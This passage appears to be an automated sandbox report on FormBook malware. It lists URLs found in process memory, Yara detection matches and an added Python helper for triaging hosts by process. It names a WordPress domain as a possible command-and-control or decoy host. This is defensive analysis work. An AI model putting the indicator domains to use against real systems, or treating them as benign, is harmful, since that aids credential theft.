Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.ceneo.pl/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.ceneo.pl/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.chennaionline.com/ncommon/images/collogo.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.cjmall.com/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.cjmall.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.clarin.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.cnet.co.uk/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.cnet.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.dailymail.co.uk/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.dailymail.co.uk/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.etmall.com.tw/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.etmall.com.tw/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.excite.co.jp/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.expedia.com/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.expedia.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2194316905.0000000004B50000.00000002.00000001.sdmp | String found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.gismeteo.ru/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.gmarket.co.kr/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.gmarket.co.kr/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.google.co.in/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.google.co.jp/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.google.co.uk/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.google.com.br/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.google.com.sa/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.google.com.tw/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.google.com/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.google.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.google.cz/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.google.de/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.google.es/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.google.fr/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.google.it/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.google.pl/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.google.ru/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.google.si/
Source: vbc.exe, 00000004.00000002.2178642047.0000000000910000.00000002.00000001.sdmp, explorer.exe, 00000008.00000000.2193008298.0000000003C40000.00000002.00000001.sdmp | String found in binary or memory: http://www.hotmail.com/oe
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.iask.com/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.iask.com/favicon.ico
Source: vbc.exe, 00000004.00000002.2179124238.0000000000AF7000.00000002.00000001.sdmp, explorer.exe, 00000008.00000000.2193231834.0000000003E27000.00000002.00000001.sdmp | String found in binary or memory: http://www.icra.org/vocabulary/.
Source: explorer.exe, 00000008.00000000.2194316905.0000000004B50000.00000002.00000001.sdmp | String found in binary or memory: http://www.iis.fhg.de/audioPA
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.kkbox.com.tw/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.kkbox.com.tw/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.linternaute.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.maktoob.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.mercadolibre.com.mx/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.mercadolibre.com.mx/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.mercadolivre.com.br/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.mercadolivre.com.br/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.merlin.com.pl/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.merlin.com.pl/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.microsofttranslator.com/?ref=IE8Activity
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.microsofttranslator.com/BV.aspx?ref=IE8Activity&amp;a=
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.microsofttranslator.com/Default.aspx?ref=IE8Activity
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.microsofttranslator.com/DefaultPrev.aspx?ref=IE8Activity
Source: vbc.exe, 00000004.00000002.2178642047.0000000000910000.00000002.00000001.sdmp, explorer.exe, 00000008.00000000.2193008298.0000000003C40000.00000002.00000001.sdmp | String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.mtv.com/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.mtv.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.myspace.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.najdi.si/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.najdi.si/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.nate.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.neckermann.de/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.neckermann.de/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.news.com.au/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.nifty.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.ocn.ne.jp/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.orange.fr/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.otto.de/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.ozon.ru/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.ozon.ru/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.ozu.es/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.paginasamarillas.es/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.paginasamarillas.es/favicon.ico
Source: wscript.exe, 00000009.00000002.2390221557.0000000002F5F000.00000004.00000001.sdmp | String found in binary or memory: http://www.paletciniz.com/
Source: wscript.exe, 00000009.00000002.2390221557.0000000002F5F000.00000004.00000001.sdmp | String found in binary or memory: http://www.paletciniz.com/2019/08/
Source: wscript.exe, 00000009.00000002.2390221557.0000000002F5F000.00000004.00000001.sdmp | String found in binary or memory: http://www.paletciniz.com/2019/08/creative-portfolio-freelance/
Source: wscript.exe, 00000009.00000002.2390221557.0000000002F5F000.00000004.00000001.sdmp | String found in binary or memory: http://www.paletciniz.com/2019/08/creative-portfolio-my-creative-cv/
Source: wscript.exe, 00000009.00000002.2390221557.0000000002F5F000.00000004.00000001.sdmp | String found in binary or memory: http://www.paletciniz.com/2019/08/creative-portfolio-new-logo-concept/
Source: wscript.exe, 00000009.00000002.2390221557.0000000002F5F000.00000004.00000001.sdmp | String found in binary or memory: http://www.paletciniz.com/2020/08/
Source: wscript.exe, 00000009.00000002.2390221557.0000000002F5F000.00000004.00000001.sdmp | String found in binary or memory: http://www.paletciniz.com/2020/08/hello-world/
Source: wscript.exe, 00000009.00000002.2390221557.0000000002F5F000.00000004.00000001.sdmp | String found in binary or memory: http://www.paletciniz.com/2020/08/hello-world/#comment-1
Source: wscript.exe, 00000009.00000002.2390221557.0000000002F5F000.00000004.00000001.sdmp | String found in binary or memory: http://www.paletciniz.com/category/uncategorized/
Source: wscript.exe, 00000009.00000002.2390221557.0000000002F5F000.00000004.00000001.sdmp | String found in binary or memory: http://www.paletciniz.com/comments/feed/
Source: wscript.exe, 00000009.00000002.2390221557.0000000002F5F000.00000004.00000001.sdmp | String found in binary or memory: http://www.paletciniz.com/d41d8-about/
Source: wscript.exe, 00000009.00000002.2390221557.0000000002F5F000.00000004.00000001.sdmp | String found in binary or memory: http://www.paletciniz.com/d41d8-blog/
Source: wscript.exe, 00000009.00000002.2390221557.0000000002F5F000.00000004.00000001.sdmp | String found in binary or memory: http://www.paletciniz.com/d41d8-contact/
Source: wscript.exe, 00000009.00000002.2390221557.0000000002F5F000.00000004.00000001.sdmp | String found in binary or memory: http://www.paletciniz.com/d41d8-portfolio-single/
Source: wscript.exe, 00000009.00000002.2390221557.0000000002F5F000.00000004.00000001.sdmp | String found in binary or memory: http://www.paletciniz.com/d41d8-portfolio/
Source: wscript.exe, 00000009.00000002.2390221557.0000000002F5F000.00000004.00000001.sdmp | String found in binary or memory: http://www.paletciniz.com/feed/
Source: wscript.exe, 00000009.00000002.2390221557.0000000002F5F000.00000004.00000001.sdmp | String found in binary or memory: http://www.paletciniz.com/wp-json/
Source: wscript.exe, 00000009.00000002.2390221557.0000000002F5F000.00000004.00000001.sdmp | String found in binary or memory: http://www.paletciniz.com/wp-login.php
Source: wscript.exe, 00000009.00000002.2390221557.0000000002F5F000.00000004.00000001.sdmp | String found in binary or memory: http://www.paletciniz.com/xmlrpc.php?rsd
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.pchome.com.tw/favicon.ico
Source: explorer.exe, 00000008.00000000.2192884231.00000000039F4000.00000004.00000001.sdmp | String found in binary or memory: http://www.piriform.com/ccleaner
Source: explorer.exe, 00000008.00000002.2389413507.0000000000260000.00000004.00000020.sdmp | String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.priceminister.com/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.priceminister.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.rakuten.co.jp/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.rambler.ru/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.rambler.ru/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.recherche.aol.fr/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.rtl.de/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.rtl.de/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.servicios.clarin.com/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.shopzilla.com/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.sify.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.so-net.ne.jp/share/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.sogou.com/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.sogou.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.soso.com/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.soso.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.t-online.de/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.taobao.com/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.taobao.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.target.com/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.target.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.tchibo.de/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.tchibo.de/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.tesco.com/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.tesco.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.timesonline.co.uk/img/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.tiscali.it/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.univision.com/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.univision.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.walmart.com/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.walmart.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2193008298.0000000003C40000.00000002.00000001.sdmp | String found in binary or memory: http://www.windows.com/pctv.
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.ya.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.yam.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www3.fnac.com/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www3.fnac.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://xml-us.amznxslt.com/onca/xml?Service=AWSECommerceService&amp;Version=2008-06-26&amp;Operation
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://z.about.com/m/a08.ico
Source: wscript.exe, 00000009.00000002.2390221557.0000000002F5F000.00000004.00000001.sdmp | String found in binary or memory: https://api.w.org/
Source: wscript.exe, 00000009.00000002.2390221557.0000000002F5F000.00000004.00000001.sdmp | String found in binary or memory: https://secureservercdn.net
Source: wscript.exe, 00000009.00000002.2390221557.0000000002F5F000.00000004.00000001.sdmp | String found in binary or memory: https://secureservercdn.net/160.153.138.53/ovz.d03.myftpupload.com/wp-content/plugins/coblocks/dist/
Source: wscript.exe, 00000009.00000002.2390221557.0000000002F5F000.00000004.00000001.sdmp | String found in binary or memory: https://secureservercdn.net/160.153.138.53/ovz.d03.myftpupload.com/wp-content/plugins/kioken-blocks/
Source: wscript.exe, 00000009.00000002.2390221557.0000000002F5F000.00000004.00000001.sdmp | String found in binary or memory: https://secureservercdn.net/160.153.138.53/ovz.d03.myftpupload.com/wp-content/plugins/otter-blocks/v
Source: wscript.exe, 00000009.00000002.2390221557.0000000002F5F000.00000004.00000001.sdmp | String found in binary or memory: https://secureservercdn.net/160.153.138.53/ovz.d03.myftpupload.com/wp-content/themes/neve/assets/js/
Source: wscript.exe, 00000009.00000002.2390221557.0000000002F5F000.00000004.00000001.sdmp | String found in binary or memory: https://secureservercdn.net/160.153.138.53/ovz.d03.myftpupload.com/wp-content/themes/neve/style.min.
Source: wscript.exe, 00000009.00000002.2390221557.0000000002F5F000.00000004.00000001.sdmp | String found in binary or memory: https://secureservercdn.net/160.153.138.53/ovz.d03.myftpupload.com/wp-content/uploads/2020/08/croppe
Source: wscript.exe, 00000009.00000002.2390221557.0000000002F5F000.00000004.00000001.sdmp | String found in binary or memory: https://secureservercdn.net/160.153.138.53/ovz.d03.myftpupload.com/wp-includes/css/dist/block-librar
Source: wscript.exe, 00000009.00000002.2390221557.0000000002F5F000.00000004.00000001.sdmp | String found in binary or memory: https://secureservercdn.net/160.153.138.53/ovz.d03.myftpupload.com/wp-includes/js/jquery/jquery.js?v
Source: wscript.exe, 00000009.00000002.2390221557.0000000002F5F000.00000004.00000001.sdmp | String found in binary or memory: https://secureservercdn.net/160.153.138.53/ovz.d03.myftpupload.com/wp-includes/js/jquery/ui/core.min
Source: wscript.exe, 00000009.00000002.2390221557.0000000002F5F000.00000004.00000001.sdmp | String found in binary or memory: https://secureservercdn.net/160.153.138.53/ovz.d03.myftpupload.com/wp-includes/js/jquery/ui/datepick
Source: wscript.exe, 00000009.00000002.2390221557.0000000002F5F000.00000004.00000001.sdmp | String found in binary or memory: https://secureservercdn.net/160.153.138.53/ovz.d03.myftpupload.com/wp-includes/js/wp-embed.min.js?ve
Source: wscript.exe, 00000009.00000002.2390221557.0000000002F5F000.00000004.00000001.sdmp | String found in binary or memory: https://secureservercdn.net/160.153.138.53/ovz.d03.myftpupload.com/wp-includes/wlwmanifest.xml?time=
Source: wscript.exe, 00000009.00000002.2390221557.0000000002F5F000.00000004.00000001.sdmp | String found in binary or memory: https://themeisle.com/themes/neve/
Source: wscript.exe, 00000009.00000002.2390221557.0000000002F5F000.00000004.00000001.sdmp | String found in binary or memory: https://wordpress.org/
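The URL rows above mix three kinds of strings: the explorer.exe rows from the 0A3E9000 dump are almost certainly the browser's bundled search-provider and accelerator defaults (note the IE8Activity references) and are background noise on any Windows 7 image; the rows shared by vbc.exe and explorer.exe point at a common system component rather than at the malware; and the WordPress page fragments for paletciniz.com and its secureservercdn.net assets are held only by wscript.exe, process 9, which is also where the FormBook Yara matches below land. Whether paletciniz.com is the live C2 or one of the decoy domains FormBook is known to contact cannot be decided from these strings alone, but it is the set worth pivoting on. The following Python is an added triage helper, not part of the report or of Joe Sandbox: it parses rows in the form shown here (accepting both the fused "sdmpString found" extraction artifact and the separated form), groups hostnames by process and returns the hosts unique to one process. The sample rows are copied from the report above; the "unique to the injected process" heuristic is the analyst's, not something the report states.

```python
import re
from collections import defaultdict
from urllib.parse import urlparse

# Constructed sample: rows copied from the report above, one of them
# rewritten in the separated "sdmp | String found" form to show both parse.
SAMPLE_ROWS = """\
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.walmart.com/
Source: vbc.exe, 00000004.00000002.2178642047.0000000000910000.00000002.00000001.sdmp, explorer.exe, 00000008.00000000.2193008298.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
Source: wscript.exe, 00000009.00000002.2390221557.0000000002F5F000.00000004.00000001.sdmpString found in binary or memory: http://www.paletciniz.com/wp-login.php
Source: wscript.exe, 00000009.00000002.2390221557.0000000002F5F000.00000004.00000001.sdmpString found in binary or memory: https://secureservercdn.net/160.153.138.53/ovz.d03.myftpupload.com/wp-includes/js/wp-embed.min.js?ve
Source: wscript.exe, 00000009.00000002.2390221557.0000000002F5F000.00000004.00000001.sdmpString found in binary or memory: https://wordpress.org/
"""

# One report row: "Source: <proc>, <dump>[, <proc>, <dump>...].sdmp" then the
# "String found in binary or memory:" column, with or without a separator.
ROW_RE = re.compile(
    r"^Source:\s*(?P<sources>.+?\.sdmp)\s*\|?\s*"
    r"String found in binary or memory:\s*(?P<url>\S+)$"
)
# A single "<process>, <dump id>.sdmp" pair inside the sources column.
SOURCE_RE = re.compile(r"(?P<proc>[\w.\-]+\.exe),\s*(?P<dump>[0-9A-Fa-f.]+\.sdmp)")


def parse_rows(text):
    """Yield (process, dump_id, url) for every row that parses; rows that
    carry two sources (string seen in two processes) yield twice."""
    for line in text.splitlines():
        m = ROW_RE.match(line.strip())
        if not m:
            continue
        url = m.group("url")
        for s in SOURCE_RE.finditer(m.group("sources")):
            yield s.group("proc"), s.group("dump"), url


def hosts_by_process(text):
    """Map process name -> set of hostnames whose URLs appeared in its memory."""
    out = defaultdict(set)
    for proc, _dump, url in parse_rows(text):
        host = urlparse(url).hostname
        if host:
            out[proc].add(host)
    return dict(out)


def hosts_unique_to(text, proc):
    """Hostnames seen in `proc` and in no other process of the report.
    For an injected process this strips the shared-DLL and browser-default
    noise and leaves the candidates for C2 or decoy traffic (analyst heuristic)."""
    by_proc = hosts_by_process(text)
    others = set().union(*(h for p, h in by_proc.items() if p != proc))
    return sorted(by_proc.get(proc, set()) - others)


if __name__ == "__main__":
    for proc, hosts in sorted(hosts_by_process(SAMPLE_ROWS).items()):
        print(f"{proc}: {sorted(hosts)}")
    print("unique to wscript.exe:", hosts_unique_to(SAMPLE_ROWS, "wscript.exe"))
```

Run against the full row list, the same function reports every host that wscript.exe alone carries; the explorer.exe favicon list drops out on its own because it never appears in the injected process.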

          E-Banking Fraud:

Yara detected FormBook
Source: Yara match | File source: 00000009.00000002.2389315305.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.2389221261.0000000000070000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.2389348504.0000000000240000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.2215222613.0000000000170000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.2179579442.0000000000EA8000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.2215291644.00000000002B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.2215328255.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 6.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.vbc.exe.e90000.0.unpack, type: UNPACKEDPE

          System Summary:

Malicious sample detected (through community Yara rule)
Source: 00000009.00000002.2389315305.00000000001D0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.2389315305.00000000001D0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.2389221261.0000000000070000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.2389221261.0000000000070000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.2389348504.0000000000240000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.2389348504.0000000000240000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.2215222613.0000000000170000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.2215222613.0000000000170000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.2179579442.0000000000EA8000.00000004.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.2179579442.0000000000EA8000.00000004.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.2215291644.00000000002B0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.2215291644.00000000002B0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.2215328255.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.2215328255.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
